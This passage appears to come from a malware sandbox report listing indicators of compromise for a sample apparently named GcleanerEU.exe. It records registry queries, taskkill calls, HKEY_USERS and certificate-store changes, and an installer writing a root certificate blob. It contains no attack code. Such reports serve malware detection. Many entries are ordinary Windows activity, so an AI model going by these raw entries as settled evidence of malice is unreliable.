WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeGcleanerEU.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU GcleanerEU.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 10 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3472 taskkill.exe 5412 taskkill.exe 31496 taskkill.exe 5548 taskkill.exe 32368 taskkill.exe 5600 taskkill.exe 6920 taskkill.exe 3792 taskkill.exe 3732 taskkill.exe 4060 taskkill.exe -
Processes:
control.exedescription ioc process Key created \Registry\User\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 control.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
compattelrunner.exepowershell.exepowershell.exeWaaSMedicAgent.exesvchost.exeWaaSMedicAgent.exemsiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\1d75a0311147cb\a37dfe62 compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.ECApp_8wekyb3d8bbwe%5Cresources.pri\1d75a03e943da6\a37dfe62 compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe%5Cresources.pri\1d75a02ff8a3e87\a37dfe62\@{C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d = "Microsoft Corporation" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.creddialoghost_cw5n1h2txyewy%5Cresources.pri\1d75a03103a4674\a37dfe62\@{C:\Windows\SystemApps\microsoft.creddialoghost_cw5n1h2txyewy\resources.pri? ms-re = "Credential Dialog" compattelrunner.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MRTCACHE\C:%5CWINDOWS%5CSYSTEMAPPS%5CMICROSOFT.WINDOWS.CLOUDEXPERIENCEHOST_CW5N1H2TXYEWY%5CRESOURCES.PRI\1D76C661473581\A37DFE62 compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\1d75a17566f896a\a37dfe62 compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppResolverUX_cw5n1h2txyewy%5Cresources.pri\1d75a03321138c compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri\1d75a03ea4ecf3 compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Search_cw5n1h2txyewy%5Cresources.pri\1d781d71e731d27 compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.11.11591.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d781d389655e16 compattelrunner.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\1d75a031035819f compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy%5Cresources.pri\1d75a033ba4eb74\a37dfe62\@{C:\Windows\SystemApps\Microsoft.Windows.AssignedAccessLockApp_cw5n = "Assigned Access Lock app" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d75a03db8de77\a37dfe62\@{C:\Windows\SystemApps\Microsoft.Windows.PeopleExperienceHost_cw5n1h2 = "Windows Shell Experience" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CallingShellApp_cw5n1h2txyewy%5Cresources.pri\1d75a02fec6b56a\a37dfe62\@{C:\Windows\SystemApps\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\re = "Microsoft Corporation" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d75a03db8de77\a37dfe62 compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\1d75a17566f896a\a37dfe62\@{C:\Windows\SystemApps\Microsoft.Windows.SecureAssessmentBrowser_ = "Take a Test" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FileExplorer_cw5n1h2txyewy%5Cresources.pri\1d75a0335b5d0ab\a37dfe62\@{C:\Windows\SystemApps\Microsoft.Windows.FileExplorer_cw5n1h2txyewy\resource = "File Explorer application" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.11.11591.0_x64__8wekyb3d8bbwe%5Cresources.pri compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Search_cw5n1h2txyewy%5Cresources.pri\1d781d71e731d27\a37dfe62\@{C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\resources.pri? ms-re = "Search the web and Windows" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AsyncTextService_8wekyb3d8bbwe%5Cresources.pri\1d75a039a93b17 compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.BioEnrollment_cw5n1h2txyewy%5Cresources.pri\1d781d323729775\a37dfe62\@{C:\Windows\SystemApps\Microsoft.BioEnrollment_cw5n1h2txyewy\resources.pri? ms-reso = "Windows Hello Setup" compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri\1d75a032a505f68\a37dfe62\@{C:\Windows\SystemApps\Microsoft.Win32WebViewHost_cw5n1h2txyewy\resources.pri? m = "Desktop App Web Viewer" compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\1d75a0311147cb\a37dfe62\@{C:\Windows\SystemApps\ParentalControls_cw5n1h2txyewy\resources.pri? ms-resource:///resourc = "Microsoft family features" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri\1d75a03421c99da\a37dfe62 compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates svchost.exe -
Modifies registry class 7 IoCs
Processes:
Explorer.EXECalculator.exeCalculator.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{86D0A433-217B-4728-8E4C-E642625EF2A4} Calculator.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{D6D02056-CE11-40F8-8D38-D6FA4D12219D} Calculator.exe -
Processes:
installer.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518b